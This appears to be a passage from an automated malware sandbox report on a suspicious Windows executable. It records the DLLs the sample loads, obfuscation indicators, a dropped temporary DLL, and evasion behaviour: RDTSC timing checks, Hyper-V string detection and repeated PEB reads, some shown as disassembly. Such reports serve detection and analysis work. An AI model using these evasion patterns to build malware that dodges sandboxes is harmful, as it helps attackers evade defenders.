    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: fwpuclnt.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: schannel.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
    Source: 3507071243740008011.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: Binary string: mshtml.pdb source: 3507071243740008011.exe, 00000005.00000001.2640954527.0000000000649000.00000020.00000001.01000000.00000006.sdmp
    Source: Binary string: wntdll.pdbUGP source: 3507071243740008011.exe, 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp, 3507071243740008011.exe, 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, 3507071243740008011.exe, 00000005.00000003.3040652875.00000000369C1000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: wntdll.pdb source: 3507071243740008011.exe, 3507071243740008011.exe, 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp, 3507071243740008011.exe, 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, 3507071243740008011.exe, 00000005.00000003.3040652875.00000000369C1000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mshtml.pdbUGP source: 3507071243740008011.exe, 00000005.00000001.2640954527.0000000000649000.00000020.00000001.01000000.00000006.sdmp

    Data Obfuscation

    Source: Yara match | File source: 00000000.00000002.2641992068.0000000005438000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW, 0_2_10001B18
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 0_2_10002DE0 push eax; ret 0_2_10002E0E
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D2135D push eax; iretd 5_2_36D21369
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D227FA pushad ; ret 5_2_36D227F9
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D2225F pushad ; ret 5_2_36D227F9
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D2283D push eax; iretd 5_2_36D22858
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D509AD push ecx; mov dword ptr [esp], ecx 5_2_36D509B6
    Source: C:\Users\user\Desktop\3507071243740008011.exe | File created: C:\Users\user\AppData\Local\Temp\nsy62D9.tmp\System.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Process information set: NOOPENFILEERRORBOX

    Malware Analysis System Evasion

    Source: C:\Users\user\Desktop\3507071243740008011.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Saddukisk233\centerleder.ini count: 45722
    Source: C:\Users\user\Desktop\3507071243740008011.exe | API/Special instruction interceptor: Address: 59AA0FB
    Source: C:\Users\user\Desktop\3507071243740008011.exe | API/Special instruction interceptor: Address: 458A0FB
    Source: C:\Users\user\Desktop\3507071243740008011.exe | RDTSC instruction interceptor: First address: 596FD31 second address: 596FD31 instructions: 0x00000000 rdtsc 0x00000002 test cx, cx 0x00000005 cmp ebx, ecx 0x00000007 jc 00007F2C6C77DF87h 0x00000009 inc ebp 0x0000000a inc ebx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\3507071243740008011.exe | RDTSC instruction interceptor: First address: 454FD31 second address: 454FD31 instructions: 0x00000000 rdtsc 0x00000002 test cx, cx 0x00000005 cmp ebx, ecx 0x00000007 jc 00007F2C6D012067h 0x00000009 inc ebp 0x0000000a inc ebx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36DCD1C0 rdtsc 5_2_36DCD1C0
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsy62D9.tmp\System.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | API coverage: 0.1 %
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 0_2_004065C5 FindFirstFileW,FindClose, 0_2_004065C5
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 0_2_00405990 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405990
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 0_2_00402862 FindFirstFileW, 0_2_00402862
    Source: 3507071243740008011.exe, 00000005.00000002.3376402237.0000000006C58000.00000004.00000020.00020000.00000000.sdmp, 3507071243740008011.exe, 00000005.00000002.3376402237.0000000006CAD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
    Source: 3507071243740008011.exe, 00000005.00000002.3376402237.0000000006CAD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWL'Y
    Source: C:\Users\user\Desktop\3507071243740008011.exe | API call chain: ExitProcess graph end node graph_0-4581
    Source: C:\Users\user\Desktop\3507071243740008011.exe | API call chain: ExitProcess graph end node graph_0-4577
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36DCD1C0 rdtsc 5_2_36DCD1C0
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D935C0 NtCreateMutant,LdrInitializeThunk, 5_2_36D935C0
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW, 0_2_10001B18
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36E0D6F0 mov eax, dword ptr fs:[00000030h] 5_2_36E0D6F0
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D5B6C0 mov eax, dword ptr fs:[00000030h] 5_2_36D5B6C0
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D5B6C0 mov eax, dword ptr fs:[00000030h] 5_2_36D5B6C0
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D5B6C0 mov eax, dword ptr fs:[00000030h] 5_2_36D5B6C0
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D5B6C0 mov eax, dword ptr fs:[00000030h] 5_2_36D5B6C0
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D5B6C0 mov eax, dword ptr fs:[00000030h] 5_2_36D5B6C0
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D5B6C0 mov eax, dword ptr fs:[00000030h] 5_2_36D5B6C0
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D816CF mov eax, dword ptr fs:[00000030h] 5_2_36D816CF
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36E0F6C7 mov eax, dword ptr fs:[00000030h] 5_2_36E0F6C7
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36E116CC mov eax, dword ptr fs:[00000030h] 5_2_36E116CC
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36E116CC mov eax, dword ptr fs:[00000030h] 5_2_36E116CC
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36E116CC mov eax, dword ptr fs:[00000030h] 5_2_36E116CC
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36E116CC mov eax, dword ptr fs:[00000030h] 5_2_36E116CC
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36DE36EE mov eax, dword ptr fs:[00000030h] 5_2_36DE36EE
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36DE36EE mov eax, dword ptr fs:[00000030h] 5_2_36DE36EE
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36DE36EE mov eax, dword ptr fs:[00000030h] 5_2_36DE36EE
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36DE36EE mov eax, dword ptr fs:[00000030h] 5_2_36DE36EE
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36DE36EE mov eax, dword ptr fs:[00000030h] 5_2_36DE36EE
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36DE36EE mov eax, dword ptr fs:[00000030h] 5_2_36DE36EE
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D7D6E0 mov eax, dword ptr fs:[00000030h] 5_2_36D7D6E0
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D7D6E0 mov eax, dword ptr fs:[00000030h] 5_2_36D7D6E0
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36DD368C mov eax, dword ptr fs:[00000030h] 5_2_36DD368C
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36DD368C mov eax, dword ptr fs:[00000030h] 5_2_36DD368C
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36DD368C mov eax, dword ptr fs:[00000030h] 5_2_36DD368C
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36DD368C mov eax, dword ptr fs:[00000030h] 5_2_36DD368C
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D476B2 mov eax, dword ptr fs:[00000030h] 5_2_36D476B2
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D476B2 mov eax, dword ptr fs:[00000030h] 5_2_36D476B2
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D476B2 mov eax, dword ptr fs:[00000030h] 5_2_36D476B2
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D4D6AA mov eax, dword ptr fs:[00000030h] 5_2_36D4D6AA
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D4D6AA mov eax, dword ptr fs:[00000030h] 5_2_36D4D6AA
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D89660 mov eax, dword ptr fs:[00000030h] 5_2_36D89660
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D89660 mov eax, dword ptr fs:[00000030h] 5_2_36D89660
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36DED660 mov eax, dword ptr fs:[00000030h] 5_2_36DED660
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D53616 mov eax, dword ptr fs:[00000030h] 5_2_36D53616
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D53616 mov eax, dword ptr fs:[00000030h] 5_2_36D53616
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36E25636 mov eax, dword ptr fs:[00000030h] 5_2_36E25636
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D8F603 mov eax, dword ptr fs:[00000030h] 5_2_36D8F603
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D81607 mov eax, dword ptr fs:[00000030h] 5_2_36D81607
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D4F626 mov eax, dword ptr fs:[00000030h] 5_2_36D4F626
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D4F626 mov eax, dword ptr fs:[00000030h] 5_2_36D4F626
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D4F626 mov eax, dword ptr fs:[00000030h] 5_2_36D4F626
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D4F626 mov eax, dword ptr fs:[00000030h] 5_2_36D4F626
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D4F626 mov eax, dword ptr fs:[00000030h] 5_2_36D4F626
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D4F626 mov eax, dword ptr fs:[00000030h] 5_2_36D4F626
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D4F626 mov eax, dword ptr fs:[00000030h] 5_2_36D4F626
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D4F626 mov eax, dword ptr fs:[00000030h] 5_2_36D4F626
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D4F626 mov eax, dword ptr fs:[00000030h] 5_2_36D4F626
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D557C0 mov eax, dword ptr fs:[00000030h] 5_2_36D557C0
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D557C0 mov eax, dword ptr fs:[00000030h] 5_2_36D557C0
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D557C0 mov eax, dword ptr fs:[00000030h] 5_2_36D557C0
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D5D7E0 mov ecx, dword ptr fs:[00000030h] 5_2_36D5D7E0
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36E0D7B0 mov eax, dword ptr fs:[00000030h] 5_2_36E0D7B0
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36E0D7B0 mov eax, dword ptr fs:[00000030h] 5_2_36E0D7B0
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36E237B6 mov eax, dword ptr fs:[00000030h] 5_2_36E237B6
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D7D7B0 mov eax, dword ptr fs:[00000030h] 5_2_36D7D7B0
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36E0F78A mov eax, dword ptr fs:[00000030h] 5_2_36E0F78A
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D4F7BA mov eax, dword ptr fs:[00000030h] 5_2_36D4F7BA
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D4F7BA mov eax, dword ptr fs:[00000030h] 5_2_36D4F7BA
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D4F7BA mov eax, dword ptr fs:[00000030h] 5_2_36D4F7BA
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D4F7BA mov eax, dword ptr fs:[00000030h] 5_2_36D4F7BA
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D4F7BA mov eax, dword ptr fs:[00000030h] 5_2_36D4F7BA
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D4F7BA mov eax, dword ptr fs:[00000030h] 5_2_36D4F7BA
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D4F7BA mov eax, dword ptr fs:[00000030h] 5_2_36D4F7BA
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D4F7BA mov eax, dword ptr fs:[00000030h] 5_2_36D4F7BA
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D4F7BA mov eax, dword ptr fs:[00000030h] 5_2_36D4F7BA
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36DDF7AF mov eax, dword ptr fs:[00000030h] 5_2_36DDF7AF
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36DDF7AF mov eax, dword ptr fs:[00000030h] 5_2_36DDF7AF
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36DDF7AF mov eax, dword ptr fs:[00000030h] 5_2_36DDF7AF
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36DDF7AF mov eax, dword ptr fs:[00000030h] 5_2_36DDF7AF
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36DDF7AF mov eax, dword ptr fs:[00000030h] 5_2_36DDF7AF
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36DD97A9 mov eax, dword ptr fs:[00000030h] 5_2_36DD97A9
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36DF375F mov eax, dword ptr fs:[00000030h] 5_2_36DF375F
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36DF375F mov eax, dword ptr fs:[00000030h] 5_2_36DF375F
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36DF375F mov eax, dword ptr fs:[00000030h] 5_2_36DF375F
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36DF375F mov eax, dword ptr fs:[00000030h] 5_2_36DF375F
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36DF375F mov eax, dword ptr fs:[00000030h] 5_2_36DF375F
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D63740 mov eax, dword ptr fs:[00000030h] 5_2_36D63740
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D63740 mov eax, dword ptr fs:[00000030h] 5_2_36D63740
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D63740 mov eax, dword ptr fs:[00000030h] 5_2_36D63740
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36E23749 mov eax, dword ptr fs:[00000030h] 5_2_36E23749
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D4B765 mov eax, dword ptr fs:[00000030h] 5_2_36D4B765
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D4B765 mov eax, dword ptr fs:[00000030h] 5_2_36D4B765
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D4B765 mov eax, dword ptr fs:[00000030h] 5_2_36D4B765
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D4B765 mov eax, dword ptr fs:[00000030h] 5_2_36D4B765
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D8F71F mov eax, dword ptr fs:[00000030h] 5_2_36D8F71F
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D8F71F mov eax, dword ptr fs:[00000030h] 5_2_36D8F71F
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36E1972B mov eax, dword ptr fs:[00000030h] 5_2_36E1972B
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36E0F72E mov eax, dword ptr fs:[00000030h] 5_2_36E0F72E
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D57703 mov eax, dword ptr fs:[00000030h] 5_2_36D57703
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D55702 mov eax, dword ptr fs:[00000030h] 5_2_36D55702
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D55702 mov eax, dword ptr fs:[00000030h] 5_2_36D55702
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36E2B73C mov eax, dword ptr fs:[00000030h] 5_2_36E2B73C
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36E2B73C mov eax, dword ptr fs:[00000030h] 5_2_36E2B73C
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36E2B73C mov eax, dword ptr fs:[00000030h] 5_2_36E2B73C
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36E2B73C mov eax, dword ptr fs:[00000030h] 5_2_36E2B73C
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D49730 mov eax, dword ptr fs:[00000030h] 5_2_36D49730
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D49730 mov eax, dword ptr fs:[00000030h] 5_2_36D49730
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D85734 mov eax, dword ptr fs:[00000030h] 5_2_36D85734
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D5973A mov eax, dword ptr fs:[00000030h] 5_2_36D5973A
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D5973A mov eax, dword ptr fs:[00000030h] 5_2_36D5973A
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D53720 mov eax, dword ptr fs:[00000030h] 5_2_36D53720
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D6F720 mov eax, dword ptr fs:[00000030h] 5_2_36D6F720
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D6F720 mov eax, dword ptr fs:[00000030h] 5_2_36D6F720
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D6F720 mov eax, dword ptr fs:[00000030h] 5_2_36D6F720
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36E254DB mov eax, dword ptr fs:[00000030h] 5_2_36E254DB
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36DF94E0 mov eax, dword ptr fs:[00000030h] 5_2_36DF94E0
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D59486 mov eax, dword ptr fs:[00000030h] 5_2_36D59486
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D59486 mov eax, dword ptr fs:[00000030h] 5_2_36D59486
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D4B480 mov eax, dword ptr fs:[00000030h] 5_2_36D4B480
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D474B0 mov eax, dword ptr fs:[00000030h] 5_2_36D474B0
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D474B0 mov eax, dword ptr fs:[00000030h] 5_2_36D474B0
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D834B0 mov eax, dword ptr fs:[00000030h] 5_2_36D834B0
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36DF74B0 mov eax, dword ptr fs:[00000030h] 5_2_36DF74B0
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36DFB450 mov eax, dword ptr fs:[00000030h] 5_2_36DFB450
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36DFB450 mov eax, dword ptr fs:[00000030h] 5_2_36DFB450
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36DFB450 mov eax, dword ptr fs:[00000030h] 5_2_36DFB450
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36DFB450 mov eax, dword ptr fs:[00000030h] 5_2_36DFB450
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D5B440 mov eax, dword ptr fs:[00000030h] 5_2_36D5B440
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D5B440 mov eax, dword ptr fs:[00000030h] 5_2_36D5B440
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D5B440 mov eax, dword ptr fs:[00000030h] 5_2_36D5B440
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D5B440 mov eax, dword ptr fs:[00000030h] 5_2_36D5B440
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D5B440 mov eax, dword ptr fs:[00000030h] 5_2_36D5B440
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D5B440 mov eax, dword ptr fs:[00000030h] 5_2_36D5B440
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36E2547F mov eax, dword ptr fs:[00000030h] 5_2_36E2547F
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36E0F453 mov eax, dword ptr fs:[00000030h] 5_2_36E0F453
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D51460 mov eax, dword ptr fs:[00000030h] 5_2_36D51460
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D51460 mov eax, dword ptr fs:[00000030h] 5_2_36D51460
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D51460 mov eax, dword ptr fs:[00000030h] 5_2_36D51460
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D51460 mov eax, dword ptr fs:[00000030h] 5_2_36D51460
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D51460 mov eax, dword ptr fs:[00000030h] 5_2_36D51460
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D6F460 mov eax, dword ptr fs:[00000030h] 5_2_36D6F460
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D6F460 mov eax, dword ptr fs:[00000030h] 5_2_36D6F460
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D6F460 mov eax, dword ptr fs:[00000030h] 5_2_36D6F460
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D6F460 mov eax, dword ptr fs:[00000030h] 5_2_36D6F460
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D6F460 mov eax, dword ptr fs:[00000030h] 5_2_36D6F460
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D6F460 mov eax, dword ptr fs:[00000030h] 5_2_36D6F460
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36DD7410 mov eax, dword ptr fs:[00000030h] 5_2_36DD7410
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D7340D mov eax, dword ptr fs:[00000030h] 5_2_36D7340D
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36DCD5D0 mov eax, dword ptr fs:[00000030h] 5_2_36DCD5D0
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36DCD5D0 mov ecx, dword ptr fs:[00000030h] 5_2_36DCD5D0
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D795DA mov eax, dword ptr fs:[00000030h] 5_2_36D795DA
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D855C0 mov eax, dword ptr fs:[00000030h] 5_2_36D855C0
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D715F4 mov eax, dword ptr fs:[00000030h] 5_2_36D715F4
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D715F4 mov eax, dword ptr fs:[00000030h] 5_2_36D715F4
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D715F4 mov eax, dword ptr fs:[00000030h] 5_2_36D715F4
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D715F4 mov eax, dword ptr fs:[00000030h] 5_2_36D715F4
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D715F4 mov eax, dword ptr fs:[00000030h] 5_2_36D715F4
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D715F4 mov eax, dword ptr fs:[00000030h] 5_2_36D715F4
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36E255C9 mov eax, dword ptr fs:[00000030h] 5_2_36E255C9
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36E235D7 mov eax, dword ptr fs:[00000030h] 5_2_36E235D7
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36E235D7 mov eax, dword ptr fs:[00000030h] 5_2_36E235D7
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36E235D7 mov eax, dword ptr fs:[00000030h] 5_2_36E235D7
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36DDB594 mov eax, dword ptr fs:[00000030h] 5_2_36DDB594
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36DDB594 mov eax, dword ptr fs:[00000030h] 5_2_36DDB594
